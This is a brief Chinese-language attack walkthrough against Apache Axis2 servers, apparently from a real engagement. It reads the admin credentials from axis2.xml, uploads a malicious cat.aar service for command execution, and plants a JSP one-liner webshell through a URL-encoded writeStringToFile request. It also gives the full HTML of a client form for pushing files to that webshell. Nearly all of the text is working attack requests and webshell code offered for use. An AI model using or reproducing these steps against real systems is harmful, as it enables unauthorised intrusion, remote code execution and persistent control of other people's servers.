实战遇到的情况---任意文件读取,读取/conf/axis2.xml内容,读取用户名和密码登录后台
1、上传cat.aar
命令执行
http://xx.xx.xx.xx/axis2/services/Cat/exec?cmd=whoami
2、获取classpath路径
http://xx.xx.xx.xx/axis2/services/Cat/getClassPathResponse
3、上传jsp一句话
<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>
将其进行URL编码后上传,如下:
http://xx.xx.xx.xx/axis2/services/Cat/writeStringToFile?data=%3c%25%20%69%66%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%21%3d%6e%75%6c%6c%29%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%4f%75%74%70%75%74%53%74%72%65%61%6d%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%2f%22%29%2b%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%29%29%2e%77%72%69%74%65%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%22%29%2e%67%65%74%42%79%74%65%73%28%29%29%3b%20%25%3e&file=/E:/j2ee/Tomcat6014/webapps/axis2/1.jsp&encoding=utf-8&append=false
本地客户端代码连接
<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>
